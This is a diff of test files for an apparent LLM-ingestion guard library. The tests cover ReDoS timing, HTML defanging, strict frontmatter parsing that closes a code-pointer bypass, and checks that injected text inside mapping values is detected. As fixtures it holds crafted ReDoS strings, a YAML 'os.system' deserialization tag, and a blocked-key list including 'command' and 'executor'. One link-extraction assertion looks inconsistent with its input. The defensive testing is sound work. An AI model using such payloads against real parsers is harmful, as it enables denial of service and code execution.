||||||
|
|
||||||
|
|
||||||
|
def test_redos_sweep_collector_covers_152_patterns_across_11_tables():
|
||||||
|
# The count docs/LIMITATIONS.md carries as "all 152 compiled patterns across
|
||||||
|
# all eleven regex-bearing modules". A pattern added or removed in `src/`
|
||||||
|
# without re-measuring would drift the doc's claim silently otherwise.
|
||||||
|
assert len(redos_sweep.TABLES) == 11
|
||||||
|
total = sum(len(collect()) for collect in redos_sweep.TABLES.values())
|
||||||
|
assert total == 152
|
||||||
|
|
||||||
|
|
||||||
|
# --- both scripts: the argument-less contract --------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize(
|
||||||
|
"script,marker",
|
||||||
|
[
|
||||||
|
("fp-sweep.py", "POPULATIONS ARE NEVER SUMMED"),
|
||||||
|
("rawhtml-census.py", "TWO METHOD TRAPS IT EXISTS TO AVOID"),
|
||||||
|
],
|
||||||
|
)
|
||||||
|
def test_script_run_without_arguments_refuses_and_prints_its_usage(script, marker):
|
||||||
|
# Corpus roots are arguments, never hardcoded, so "no arguments" must be a
|
||||||
|
# refusal — not an empty measurement that prints 0 of 0 and reads as clean.
|
||||||
|
# Run as a subprocess with no PYTHONPATH help: the scripts insert `src/`
|
||||||
|
# themselves, and being runnable standalone is part of their usage contract.
|
||||||
|
proc = subprocess.run(
|
||||||
|
[sys.executable, str(_DOCS / script)],
|
||||||
|
capture_output=True, text=True, cwd=_DOCS.parent,
|
||||||
|
env={"PATH": "/usr/bin:/bin"},
|
||||||
|
)
|
||||||
|
assert proc.returncode == 2, proc.stderr
|
||||||
|
assert marker in proc.stdout
|
||||||
|
|
@ -9,7 +9,6 @@ Detection is ``text -> findings`` (design principle 3): pure, no I/O, no
|
||||||
mutation. Disposition (WARN / QUARANTINE / FAIL_SECURE) is the caller's.
|
mutation. Disposition (WARN / QUARANTINE / FAIL_SECURE) is the caller's.
|
||||||
"""
|
"""
|
||||||
import base64
|
import base64
|
||||||
import time
|
|
||||||
|
|
||||||
import pytest
|
import pytest
|
||||||
|
|
||||||
|
|
@ -24,6 +23,7 @@ from llm_ingestion_guard.lexicon import (
|
||||||
scan_lexicon,
|
scan_lexicon,
|
||||||
)
|
)
|
||||||
from llm_ingestion_guard.report import Report, Severity, Source
|
from llm_ingestion_guard.report import Report, Severity, Source
|
||||||
|
from redos_clock import scan_seconds
|
||||||
|
|
||||||
|
|
||||||
# --- loader ------------------------------------------------------------------
|
# --- loader ------------------------------------------------------------------
|
||||||
|
|
@ -228,14 +228,36 @@ def test_oversize_input_is_capped_and_flagged():
|
||||||
|
|
||||||
|
|
||||||
def test_redos_pathological_subagent_input_returns_fast():
|
def test_redos_pathological_subagent_input_returns_fast():
|
||||||
# A crafted string that would force catastrophic backtracking on the
|
# The seed's `(?:.*?\s+)?` is quadratic on this payload; the bounded
|
||||||
# ORIGINAL nested-`.*?` sub-agent pattern. The bounded port stays linear.
|
# `{0,12}?` port that shipped instead is linear. Seed form: llm-security
|
||||||
evil = "spawn an agent that " + ("word " * 8000)
|
# 7.8.0, scanners/lib/injection-patterns.mjs:84 — this repo has never
|
||||||
start = time.monotonic()
|
# carried it (the bound is in the pattern table's FIRST commit, f397cd9),
|
||||||
r = scan_lexicon(evil)
|
# so the vulnerable form is patched in by hand, never reverted to.
|
||||||
elapsed = time.monotonic() - start
|
#
|
||||||
assert elapsed < 2.0
|
# WHAT THE PAYLOAD HAS TO DO, because two earlier shapes did neither and
|
||||||
assert isinstance(r, Report)
|
# this row sat measured-dead (1.2x) until it was found: the cost is
|
||||||
|
# per-PREFIX-MATCH, so the payload must make the prefix match at MANY start
|
||||||
|
# positions, not at one. `spawn an agent that ` REPEATED does that; the
|
||||||
|
# earlier `spawn an agent that ` + filler matched the prefix once and paid
|
||||||
|
# one lazy run, which is linear no matter how long the filler is. The
|
||||||
|
# nesting the old comment blamed is a red herring — the inner `.*?` sits in
|
||||||
|
# an OPTIONAL group, never a repeated one. What costs is that each of the
|
||||||
|
# K prefix matches drives its own O(N) lazy scan to end-of-string looking
|
||||||
|
# for a capability keyword the payload never supplies: K x O(N) = O(N^2).
|
||||||
|
# The bound caps each scan at 12 tokens, so K x O(1) = O(N).
|
||||||
|
#
|
||||||
|
# Measured through `scan_lexicon` at be9759b+, seed form patched in:
|
||||||
|
#
|
||||||
|
# words 1500 3000 6000 12000
|
||||||
|
# seed 0.091s 0.283s 1.085s 4.091s <- exponent 1.92
|
||||||
|
# shipped 0.047s 0.051s 0.094s 0.190s <- exponent 1.01
|
||||||
|
#
|
||||||
|
# At the 12000 words this row carries: 4.091s vs 0.190s = 22x, and the seed
|
||||||
|
# form breaks the 2.0s bound outright — the row failed at 4.21s with it
|
||||||
|
# patched in. Verified red, not assumed.
|
||||||
|
evil = "spawn an agent that " * 3000
|
||||||
|
assert scan_seconds(scan_lexicon, evil) < 2.0
|
||||||
|
assert isinstance(scan_lexicon(evil), Report)
|
||||||
|
|
||||||
|
|
||||||
# --- crafted ReDoS payloads against the JSON pattern table (OWASP LLM10) -----
|
# --- crafted ReDoS payloads against the JSON pattern table (OWASP LLM10) -----
|
||||||
|
|
@ -293,6 +315,4 @@ _LEXICON_REDOS_ROWS = [
|
||||||
)
|
)
|
||||||
def test_crafted_redos_payload_stays_bounded_in_the_lexicon(unit, n, bound):
|
def test_crafted_redos_payload_stays_bounded_in_the_lexicon(unit, n, bound):
|
||||||
payload = (unit * (n // len(unit) + 1))[:n]
|
payload = (unit * (n // len(unit) + 1))[:n]
|
||||||
start = time.monotonic()
|
assert scan_seconds(scan_lexicon, payload) < bound
|
||||||
scan_lexicon(payload)
|
|
||||||
assert time.monotonic() - start < bound
|
|
||||||
|
|
|
||||||
|
|
@ -11,12 +11,11 @@ empty report; only active-content constructs are ever rewritten. Mutation lives
|
||||||
here, kept separate from the report-only output gate (design principles 3 & 4).
|
here, kept separate from the report-only output gate (design principles 3 & 4).
|
||||||
The transform is pure ``text -> (defanged_text, report)`` — no I/O, no globals.
|
The transform is pure ``text -> (defanged_text, report)`` — no I/O, no globals.
|
||||||
"""
|
"""
|
||||||
import time
|
|
||||||
|
|
||||||
import pytest
|
import pytest
|
||||||
|
|
||||||
from llm_ingestion_guard.neutralize import neutralize
|
from llm_ingestion_guard.neutralize import neutralize
|
||||||
from llm_ingestion_guard.report import Severity, Source
|
from llm_ingestion_guard.report import Severity, Source
|
||||||
|
from redos_clock import scan_seconds
|
||||||
|
|
||||||
|
|
||||||
def test_clean_output_is_byte_identical():
|
def test_clean_output_is_byte_identical():
|
||||||
|
|
@ -102,6 +101,13 @@ def test_raw_active_html_is_escaped():
|
||||||
@pytest.mark.parametrize("cid,text", [
|
@pytest.mark.parametrize("cid,text", [
|
||||||
("relative-href-on-inactive-name", '<Card href="/en/agent-sdk/quickstart">'),
|
("relative-href-on-inactive-name", '<Card href="/en/agent-sdk/quickstart">'),
|
||||||
("attributeless-base", "<base />"),
|
("attributeless-base", "<base />"),
|
||||||
|
# 0.7.0's no-URL narrowing. The scanner now lets these pass — they name no
|
||||||
|
# target — but the mutator still escapes them, because a human auditing
|
||||||
|
# defanged output should see the markup that was there.
|
||||||
|
("end-tag", "</a>"),
|
||||||
|
("mdx-wrapper-component", "<Frame>"),
|
||||||
|
("self-closing-media", "<video />"),
|
||||||
|
("img-without-src", '<img alt="a diagram">'),
|
||||||
])
|
])
|
||||||
def test_mutator_still_defangs_what_the_scanner_now_lets_pass(cid, text):
|
def test_mutator_still_defangs_what_the_scanner_now_lets_pass(cid, text):
|
||||||
# The deliberate asymmetry, extended to raw HTML in 0.6.0: the SCANNER narrowed
|
# The deliberate asymmetry, extended to raw HTML in 0.6.0: the SCANNER narrowed
|
||||||
|
|
@ -174,10 +180,12 @@ _ATTR_REDOS_N = 100_000
|
||||||
|
|
||||||
|
|
||||||
def test_crafted_long_attribute_tag_stays_bounded():
|
def test_crafted_long_attribute_tag_stays_bounded():
|
||||||
|
# Carrier stays `<a `, unlike the scanner-side twin in test_active_content.py:
|
||||||
|
# the mutator keeps the whole tag set via `is_defangable_tag`, so 0.7.0's
|
||||||
|
# no-URL narrowing did not make `<a >` inert here. Verified by measurement,
|
||||||
|
# not by symmetry — see the comment on that row for what killed it there.
|
||||||
payload = "<a " + "A" * _ATTR_REDOS_N + ">"
|
payload = "<a " + "A" * _ATTR_REDOS_N + ">"
|
||||||
start = time.monotonic()
|
assert scan_seconds(neutralize, payload) < 2.0
|
||||||
neutralize(payload)
|
|
||||||
assert time.monotonic() - start < 2.0
|
|
||||||
|
|
||||||
|
|
||||||
def test_url_defanging_inside_a_tag_survives_the_redos_fix():
|
def test_url_defanging_inside_a_tag_survives_the_redos_fix():
|
||||||
|
|
|
||||||
|
|
@ -17,8 +17,6 @@ OKF spec facts used here (verified against okf/SPEC.md, 2026-07-06):
|
||||||
"""
|
"""
|
||||||
import pytest
|
import pytest
|
||||||
|
|
||||||
import time
|
|
||||||
|
|
||||||
from llm_ingestion_guard.okf import (
|
from llm_ingestion_guard.okf import (
|
||||||
parse_frontmatter,
|
parse_frontmatter,
|
||||||
scan_concept,
|
scan_concept,
|
||||||
|
|
@ -41,6 +39,7 @@ from llm_ingestion_guard.okf import (
|
||||||
from llm_ingestion_guard.report import Report
|
from llm_ingestion_guard.report import Report
|
||||||
from llm_ingestion_guard.disposition import Trust, Disposition, PRESET_USER_UPLOAD
|
from llm_ingestion_guard.disposition import Trust, Disposition, PRESET_USER_UPLOAD
|
||||||
from llm_ingestion_guard import screen_output
|
from llm_ingestion_guard import screen_output
|
||||||
|
from redos_clock import scan_seconds
|
||||||
|
|
||||||
|
|
||||||
# --- happy path: split + parse the minimal flat subset -----------------------
|
# --- happy path: split + parse the minimal flat subset -----------------------
|
||||||
|
|
@ -578,15 +577,59 @@ def test_v02_flat_frontmatter_still_parses(cid, fm):
|
||||||
assert parse_frontmatter(f"---\nid: x\n{fm}---\n\nbody\n")[0]["id"] == "x"
|
assert parse_frontmatter(f"---\nid: x\n{fm}---\n\nbody\n")[0]["id"] == "x"
|
||||||
|
|
||||||
|
|
||||||
def test_one_key_block_sequence_item_is_misparsed_as_a_string():
|
# --- the type-confusion defect, closed in 1.1.0 (2026-08-13) ----------------
|
||||||
# The documented defect: two keys per item hard-reject (loud, safe), but ONE key
|
# Was: a mapping construct that the restricted grammar cannot represent degraded
|
||||||
# parses "successfully" into the wrong type. A consumer reading
|
# into a STRING instead of failing. Two routes did this, not the one documented.
|
||||||
# frontmatter["sources"][0].get("uri") gets a string, not a mapping.
|
# Ground-truthed against PyYAML 6.0.3: every shape below that we now reject is a
|
||||||
fm, _ = parse_frontmatter(
|
# shape a real YAML parser reads as a MAPPING (or refuses outright), and every
|
||||||
"---\nid: x\nsources:\n - uri: https://e.com/a\n---\n\nbody\n"
|
# shape we still admit is one PyYAML reads as a plain scalar.
|
||||||
)
|
|
||||||
assert fm["sources"] == ["uri: https://e.com/a"], "shape changed — update LIMITATIONS.md"
|
_DEGRADED_TO_STRING = [
|
||||||
assert not isinstance(fm["sources"][0], dict)
|
# (id, frontmatter, what PyYAML 6.0.3 makes of it)
|
||||||
|
("one key per item", "sources:\n - uri: https://e.com/a\n", "[{'uri': ...}]"),
|
||||||
|
("item, trailing colon", "sources:\n - uri:\n", "[{'uri': None}]"),
|
||||||
|
("inline double colon", "attester: resource: attesters/sql_equality.py\n", "parse error"),
|
||||||
|
("top value, trailing colon", "description: see below:\n", "parse error"),
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("cid,fm,yaml_reads_as", _DEGRADED_TO_STRING,
|
||||||
|
ids=[c[0] for c in _DEGRADED_TO_STRING])
|
||||||
|
def test_a_mapping_construct_never_degrades_into_a_string(cid, fm, yaml_reads_as):
|
||||||
|
# None of these shapes is the one form T2 admits (G3, the allowlisted flow
|
||||||
|
# mapping) — so each must RAISE, never parse "successfully" into the wrong
|
||||||
|
# type. A consumer reading frontmatter["sources"][0].get("uri") must not be
|
||||||
|
# handed a str, and that holds whether the mapping class has no expressible
|
||||||
|
# form or one.
|
||||||
|
with pytest.raises(OKFFrontmatterError):
|
||||||
|
parse_frontmatter(f"---\nid: x\n{fm}---\n\nbody\n")
|
||||||
|
|
||||||
|
|
||||||
|
_STILL_SCALARS = [
|
||||||
|
# PyYAML reads every one of these as a plain scalar: the colon carries no
|
||||||
|
# space and no line end, so it never opens a mapping. Over-blocking a
|
||||||
|
# conformant bundle is itself a failure mode (brief principle 5).
|
||||||
|
("colon, no space", "tags:\n - domain:security\n", "tags", ["domain:security"]),
|
||||||
|
("url item", "sources:\n - https://e.com/a\n", "sources", ["https://e.com/a"]),
|
||||||
|
("url item with port", "sources:\n - https://e.com:8443/a\n", "sources",
|
||||||
|
["https://e.com:8443/a"]),
|
||||||
|
("url value with port", "resource: https://e.com:8443/a\n", "resource",
|
||||||
|
"https://e.com:8443/a"),
|
||||||
|
("double-quoted item", 'sources:\n - "uri: https://e.com/a"\n', "sources",
|
||||||
|
['"uri: https://e.com/a"']),
|
||||||
|
("single-quoted item", "sources:\n - 'uri: https://e.com/a'\n", "sources",
|
||||||
|
["'uri: https://e.com/a'"]),
|
||||||
|
("quoted top value", 'description: "Note: careful"\n', "description",
|
||||||
|
'"Note: careful"'),
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("cid,fm,key,expected", _STILL_SCALARS,
|
||||||
|
ids=[c[0] for c in _STILL_SCALARS])
|
||||||
|
def test_scalars_that_merely_contain_a_colon_still_parse(cid, fm, key, expected):
|
||||||
|
# Quotes are retained rather than stripped — a pre-existing divergence from
|
||||||
|
# YAML, pinned here so closing the mapping hole is not read as fixing it.
|
||||||
|
assert parse_frontmatter(f"---\nid: x\n{fm}---\n\nbody\n")[0][key] == expected
|
||||||
|
|
||||||
|
|
||||||
def test_relative_resource_pointer_fails_the_allowlist():
|
def test_relative_resource_pointer_fails_the_allowlist():
|
||||||
|
|
@ -596,42 +639,51 @@ def test_relative_resource_pointer_fails_the_allowlist():
|
||||||
validate_resource_url(pointer)
|
validate_resource_url(pointer)
|
||||||
|
|
||||||
|
|
||||||
def test_pointer_in_one_key_sequence_reaches_the_consumer_tree():
|
@pytest.mark.parametrize("cid,carrier", [
|
||||||
# The security-relevant consequence of the misparse above: the pointer never
|
("block sequence", "attester:\n - resource: attesters/sql_equality.py\n"),
|
||||||
# touches the top-level `resource` key, so the https allowlist never inspects it
|
("inline double colon", "attester: resource: attesters/sql_equality.py\n"),
|
||||||
# and door C admits the concept. Not conformant OKF — a well-formed bundle will
|
])
|
||||||
# not produce this shape — but mode-b writes the merged concept verbatim.
|
def test_pointer_in_a_degraded_mapping_no_longer_reaches_the_consumer_tree(cid, carrier):
|
||||||
doc = ("---\nid: x\ntype: Attested Computation\n"
|
# The security-relevant consequence, closed at door C. Both carriers put the
|
||||||
"attester:\n - resource: attesters/sql_equality.py\n---\n\nbody\n")
|
# pointer in a key the https allowlist never inspects, so while the shape
|
||||||
|
# parsed, mode-b wrote the merged concept verbatim. It now fails secure at T2,
|
||||||
|
# before the allowlist is even reached.
|
||||||
|
doc = f"---\nid: x\ntype: Attested Computation\n{carrier}---\n\nbody\n"
|
||||||
result = import_bundle({"computations/x.md": doc})
|
result = import_bundle({"computations/x.md": doc})
|
||||||
assert result.disposition is Disposition.WARN, "hole closed — update LIMITATIONS.md"
|
assert result.disposition is Disposition.FAIL_SECURE, "hole reopened — see LIMITATIONS.md"
|
||||||
|
|
||||||
|
|
||||||
def test_every_route_to_a_mapping_fails_on_a_different_rule():
|
def test_exactly_one_route_to_a_mapping_is_expressible():
|
||||||
# The v0.2 wall is not a choice between two forms where one is better: ALL three
|
# Was: ALL FOUR routes failed, each on its own rule, so the mapping *class* had
|
||||||
# ways to express a mapping fail, each on its own rule, so the mapping *class* has
|
# no expressible form (and v0.2's `generated` could not be written at all). G3
|
||||||
# no expressible form through T2. v0.2's `generated` IS a mapping (`by` required
|
# opens exactly ONE of them - the allowlisted flow form - and the other three
|
||||||
# when present), so it cannot be expressed at all.
|
# still fail, each on its own rule. That the openable route is the one whose
|
||||||
|
# every key the allowlist inspects is the whole design: block, dotted and inline
|
||||||
|
# give the allowlist nothing to inspect, so they stay shut.
|
||||||
|
assert parse_frontmatter("---\nid: x\ngenerated: { by: x, at: y }\n---\n\nbody\n")[0][
|
||||||
|
"generated"] == {"by": "x", "at": "y"}
|
||||||
|
|
||||||
routes = {
|
routes = {
|
||||||
"flow": "generated: { by: x, at: y }\n",
|
|
||||||
"block": "generated:\n by: x\n",
|
"block": "generated:\n by: x\n",
|
||||||
"dotted": "generated.by: x\n",
|
"dotted": "generated.by: x\n",
|
||||||
|
"inline": "generated: by: x\n",
|
||||||
}
|
}
|
||||||
errors = {}
|
errors = {}
|
||||||
for name, fm in routes.items():
|
for name, fm in routes.items():
|
||||||
with pytest.raises(OKFFrontmatterError) as exc:
|
with pytest.raises(OKFFrontmatterError) as exc:
|
||||||
parse_frontmatter(f"---\nid: x\n{fm}---\n\nbody\n")
|
parse_frontmatter(f"---\nid: x\n{fm}---\n\nbody\n")
|
||||||
errors[name] = str(exc.value)
|
errors[name] = str(exc.value)
|
||||||
assert "indicator" in errors["flow"]
|
|
||||||
assert "nested mappings" in errors["block"]
|
assert "nested mappings" in errors["block"]
|
||||||
assert "key" in errors["dotted"]
|
assert "key" in errors["dotted"]
|
||||||
|
assert "mapping" in errors["inline"]
|
||||||
assert len(set(errors.values())) == 3, "routes must fail distinctly, not collapse"
|
assert len(set(errors.values())) == 3, "routes must fail distinctly, not collapse"
|
||||||
|
|
||||||
|
|
||||||
_BLOCK_LIST_ITEM_SHAPES = [
|
_BLOCK_LIST_ITEM_SHAPES = [
|
||||||
# A consumer called all three "the sources block list"; the parser does not.
|
# A consumer called all three "the sources block list"; the parser does not.
|
||||||
|
# The one-key-per-item row lived here until 1.1.0, admitted as the string
|
||||||
|
# "id: a"; it now hard-rejects with the two-key row (_DEGRADED_TO_STRING).
|
||||||
("flat scalars", "sources:\n - file://x\n - file://y\n", ["file://x", "file://y"]),
|
("flat scalars", "sources:\n - file://x\n - file://y\n", ["file://x", "file://y"]),
|
||||||
("one key per item", "sources:\n - id: a\n", ["id: a"]), # silent misparse
|
|
||||||
("single-element", "verified:\n - human:ktg\n", ["human:ktg"]),
|
("single-element", "verified:\n - human:ktg\n", ["human:ktg"]),
|
||||||
]
|
]
|
||||||
|
|
||||||
|
|
@ -651,7 +703,9 @@ def test_two_keys_per_item_is_where_the_block_list_hard_rejects():
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize("fm", [
|
@pytest.mark.parametrize("fm", [
|
||||||
"generated: { by: x, at: y }\n", "sources: [{ id: a }]\n", "tags: [a, b]\n",
|
# The flow row carries a key OFF the G3 allowlist: the shape is admitted, the
|
||||||
|
# key is not, so this stays a T2 rejection and the door A/B half still holds.
|
||||||
|
"generated: { by: x, tool: y }\n", "sources: [{ id: a }]\n", "tags: [a, b]\n",
|
||||||
"generated:\n by: x\n", "generated.by: x\n",
|
"generated:\n by: x\n", "generated.by: x\n",
|
||||||
"sources:\n - id: a\n resource: file://x\n",
|
"sources:\n - id: a\n resource: file://x\n",
|
||||||
])
|
])
|
||||||
|
|
@ -676,9 +730,7 @@ _LINK_REDOS_N = 100_000
|
||||||
|
|
||||||
|
|
||||||
def test_crafted_link_payload_stays_bounded():
|
def test_crafted_link_payload_stays_bounded():
|
||||||
start = time.monotonic()
|
assert scan_seconds(extract_link_targets, "[" * _LINK_REDOS_N) < 2.0
|
||||||
extract_link_targets("[" * _LINK_REDOS_N)
|
|
||||||
assert time.monotonic() - start < 2.0
|
|
||||||
|
|
||||||
|
|
||||||
# The destination run behind the label gets no row: `[^)\s]+` needs only one
|
# The destination run behind the label gets no row: `[^)\s]+` needs only one
|
||||||
|
|
@ -693,3 +745,161 @@ def test_link_extraction_survives_the_redos_fix():
|
||||||
assert extract_link_targets("see [x](./a.md) and [y](/b.md)") == ["./a.md", "/b.md"]
|
assert extract_link_targets("see [x](./a.md) and [y](/b.md)") == ["./a.md", "/b.md"]
|
||||||
assert extract_link_targets("[a b](./c.md)") == ["./c.md"]
|
assert extract_link_targets("[a b](./c.md)") == ["./c.md"]
|
||||||
assert extract_link_targets("text [](./t.md)") == ["./i.png"]
|
assert extract_link_targets("text [](./t.md)") == ["./i.png"]
|
||||||
|
|
||||||
|
|
||||||
|
# --- G3: the typed, allowlisted mapping form (2026-08-21) --------------------
|
||||||
|
# Door 1 of three (operator decision, 2026-08-21). The mapping *class* had no
|
||||||
|
# expressible form, and OKF v0.2 writes its whole trust and provenance layer as
|
||||||
|
# mappings — SPEC.md @ 62432a09 §5.2 uses flow form in its own examples, and §11
|
||||||
|
# carries a hard MUST that presupposes they parse ("consumers MUST treat a bare
|
||||||
|
# `verified` mapping as a one-element list"). A consumer measured 0 of 53
|
||||||
|
# upstream concepts through the gate. This admits ONE shape: a flow mapping whose
|
||||||
|
# every key is on the allowlist and whose every leaf is a plain scalar.
|
||||||
|
|
||||||
|
def test_spec_flow_mapping_parses_into_a_typed_mapping():
|
||||||
|
# SPEC.md §5.2, verbatim. This is the red test: it must fail before the form
|
||||||
|
# exists and pass after, with a real dict — never a degraded string.
|
||||||
|
doc = (
|
||||||
|
"---\ntype: table\n"
|
||||||
|
"generated: { by: reference_agent/gemini-2.5-pro, at: 2026-06-20T22:53:05Z }\n"
|
||||||
|
"---\nbody\n"
|
||||||
|
)
|
||||||
|
assert parse_frontmatter(doc)[0]["generated"] == {
|
||||||
|
"by": "reference_agent/gemini-2.5-pro",
|
||||||
|
"at": "2026-06-20T22:53:05Z",
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def test_spec_bare_verified_mapping_parses():
|
||||||
|
# SPEC.md §5.2's bare form, which §11 turns into a hard MUST for consumers
|
||||||
|
# ("MUST treat a bare `verified` mapping as a one-element list") - a rule that
|
||||||
|
# cannot be obeyed by a consumer that cannot parse the mapping.
|
||||||
|
doc = "---\ntype: table\nverified: { by: human:ahormati, at: 2026-06-25T09:00:00Z }\n---\nb\n"
|
||||||
|
assert parse_frontmatter(doc)[0]["verified"] == {
|
||||||
|
"by": "human:ahormati", "at": "2026-06-25T09:00:00Z"}
|
||||||
|
|
||||||
|
|
||||||
|
def test_spec_verified_list_of_flow_mappings_parses():
|
||||||
|
# §5.2's list form. This is the SAME typed form in list position, not the
|
||||||
|
# block-sequence-with-one-key route (`- uri: x`), which stays shut below.
|
||||||
|
doc = (
|
||||||
|
"---\ntype: table\nverified:\n"
|
||||||
|
" - { by: human:ahormati, at: 2026-06-25T09:00:00Z }\n"
|
||||||
|
" - { by: process:finance-nightly, at: 2026-06-26T02:00:00Z }\n"
|
||||||
|
"---\nbody\n"
|
||||||
|
)
|
||||||
|
assert parse_frontmatter(doc)[0]["verified"] == [
|
||||||
|
{"by": "human:ahormati", "at": "2026-06-25T09:00:00Z"},
|
||||||
|
{"by": "process:finance-nightly", "at": "2026-06-26T02:00:00Z"},
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
def test_spec_usage_window_parses():
|
||||||
|
doc = "---\ntype: table\nusage_window: { from: 2026-06-01T00:00:00Z, to: 2026-06-30T00:00:00Z }\n---\nb\n"
|
||||||
|
assert parse_frontmatter(doc)[0]["usage_window"] == {
|
||||||
|
"from": "2026-06-01T00:00:00Z", "to": "2026-06-30T00:00:00Z"}
|
||||||
|
|
||||||
|
|
||||||
|
def test_an_unknown_key_inside_a_mapping_is_still_rejected():
|
||||||
|
# The rejection side of the allowlist. Without this test the allowlist could
|
||||||
|
# silently grow to "anything" - or be emptied - and nothing would fail.
|
||||||
|
with pytest.raises(OKFFrontmatterError) as exc:
|
||||||
|
parse_frontmatter("---\nid: x\ngenerated: { by: a, tool: shell }\n---\n\nbody\n")
|
||||||
|
assert "allowlist" in str(exc.value)
|
||||||
|
|
||||||
|
|
||||||
|
def test_the_allowlist_is_not_empty_and_admits_only_the_spec_keys():
|
||||||
|
# Both directions of the same guard: a shrunk allowlist breaks the first
|
||||||
|
# assertion, a widened one the second.
|
||||||
|
for key in ("by", "at", "from", "to", "id", "title", "author", "usage_count",
|
||||||
|
"last_modified"):
|
||||||
|
assert parse_frontmatter(f"---\nid: x\nk: {{ {key}: v }}\n---\n\nb\n")[0]["k"] == {key: "v"}
|
||||||
|
for key in ("resource", "executor", "attester", "runtime", "command", "uri"):
|
||||||
|
with pytest.raises(OKFFrontmatterError):
|
||||||
|
parse_frontmatter(f"---\nid: x\nk: {{ {key}: v }}\n---\n\nb\n")
|
||||||
|
|
||||||
|
|
||||||
|
_FLOW_REJECTED = [
|
||||||
|
# (id, value, what PyYAML 6.0.3 makes of it)
|
||||||
|
("nested mapping", "{ by: { at: x } }", "a nested mapping"),
|
||||||
|
("nested sequence", "{ by: [a, b] }", "a sequence leaf"),
|
||||||
|
("anchor leaf", "{ by: &a x }", "an anchor definition, silently"),
|
||||||
|
("tag leaf", "{ by: !!python/object:os.system x }", "refused outright"),
|
||||||
|
("block scalar leaf", "{ by: | }", "a scanner error"),
|
||||||
|
("nested colon leaf", "{ by: sub: v }", "refused outright"),
|
||||||
|
("no space after colon", "{by:x}", "the KEY 'by:x', not a scalar"),
|
||||||
|
("quoted leaf", "{ title: 'a, b' }", "a scalar - we refuse, deliberately"),
|
||||||
|
("empty mapping", "{}", "an empty mapping"),
|
||||||
|
("empty leaf", "{ by: }", "None"),
|
||||||
|
("unclosed", "{ by: x", "a parse error"),
|
||||||
|
("trailing junk", "{ by: x } more", "a parse error"),
|
||||||
|
("duplicate key", "{ by: a, by: b }", "last-wins, silently"),
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("cid,value,yaml_reads_as", _FLOW_REJECTED,
|
||||||
|
ids=[c[0] for c in _FLOW_REJECTED])
|
||||||
|
def test_the_mapping_form_admits_scalar_leaves_on_allowlisted_keys_only(cid, value, yaml_reads_as):
|
||||||
|
with pytest.raises(OKFFrontmatterError):
|
||||||
|
parse_frontmatter(f"---\nid: x\ngenerated: {value}\n---\n\nbody\n")
|
||||||
|
|
||||||
|
|
||||||
|
def test_a_rejected_mapping_never_degrades_into_a_string():
|
||||||
|
# The 1.1.0 defect, re-asserted against the NEW form: a refused mapping must
|
||||||
|
# raise, not arrive as a str a consumer will .get() a key out of.
|
||||||
|
for value in ("{ by: { at: x } }", "{ tool: shell }", "{ by: x"):
|
||||||
|
with pytest.raises(OKFFrontmatterError):
|
||||||
|
parse_frontmatter(f"---\nid: x\ngenerated: {value}\n---\n\nbody\n")
|
||||||
|
|
||||||
|
|
||||||
|
def test_the_admitted_mapping_is_a_dict_not_a_string():
|
||||||
|
value = parse_frontmatter("---\nid: x\ngenerated: { by: a, at: b }\n---\n\nb\n")[0]["generated"]
|
||||||
|
assert isinstance(value, dict), "a typed form that arrives as a str is the 1.1.0 defect"
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("cid,fm", [
|
||||||
|
("block sequence, one key", "attester:\n - resource: attesters/sql_equality.py\n"),
|
||||||
|
("inline second colon", "attester: resource: attesters/sql_equality.py\n"),
|
||||||
|
("block mapping", "attester:\n resource: attesters/sql_equality.py\n"),
|
||||||
|
("flow mapping, pointer key", "attester: { resource: attesters/sql_equality.py }\n"),
|
||||||
|
])
|
||||||
|
def test_the_pointer_routes_stay_shut(cid, fm):
|
||||||
|
# G3 is additive: none of the routes that put an executable-code pointer in a
|
||||||
|
# key the https allowlist never inspects is reopened. The fourth row is why
|
||||||
|
# `resource` is off the allowlist - the form would otherwise have carried the
|
||||||
|
# door-C pointer through in typed clothes instead of degraded ones.
|
||||||
|
doc = f"---\nid: x\ntype: Attested Computation\n{fm}---\n\nbody\n"
|
||||||
|
with pytest.raises(OKFFrontmatterError):
|
||||||
|
parse_frontmatter(doc)
|
||||||
|
assert import_bundle({"computations/x.md": doc}).disposition is Disposition.FAIL_SECURE
|
||||||
|
|
||||||
|
|
||||||
|
def test_injection_in_a_mapping_leaf_is_caught_by_the_scan():
|
||||||
|
# T1 is not weakened by the new shape: a mapping leaf is scanned exactly like a
|
||||||
|
# scalar value or a list item. A typed form that parses but is not scanned would
|
||||||
|
# be a hole, not a fix.
|
||||||
|
doc = f"---\ntype: table\ngenerated: {{ by: {_INJECTION} }}\n---\nclean body\n"
|
||||||
|
assert scan_concept(doc).found is True
|
||||||
|
|
||||||
|
|
||||||
|
def test_injection_in_a_listed_mapping_leaf_is_caught_by_the_scan():
|
||||||
|
doc = f"---\ntype: table\nverified:\n - {{ by: {_INJECTION} }}\n---\nclean body\n"
|
||||||
|
assert scan_concept(doc).found is True
|
||||||
|
|
||||||
|
|
||||||
|
def test_a_conformant_v02_trust_layer_now_reaches_the_gate():
|
||||||
|
# The measured consequence: a consumer reported 0 of 53 upstream concepts through
|
||||||
|
# the gate, because every one of them carries §5.2 trust frontmatter.
|
||||||
|
doc = (
|
||||||
|
"---\n"
|
||||||
|
"type: table\n"
|
||||||
|
"title: Users\n"
|
||||||
|
"resource: https://example.com/users\n"
|
||||||
|
"generated: { by: reference_agent/gemini-2.5-pro, at: 2026-06-20T22:53:05Z }\n"
|
||||||
|
"verified: { by: human:ahormati, at: 2026-06-25T09:00:00Z }\n"
|
||||||
|
"usage_window: { from: 2026-06-01T00:00:00Z, to: 2026-06-30T00:00:00Z }\n"
|
||||||
|
"---\nThe users table.\n"
|
||||||
|
)
|
||||||
|
result = import_bundle({"tables/users.md": doc})
|
||||||
|
assert result.disposition is Disposition.WARN
|
||||||
|
assert result.concepts[0].error is None
|
||||||
|
|
|
||||||
|
|
@ -35,6 +35,7 @@ from llm_ingestion_guard.active_content import scan_active_content
|
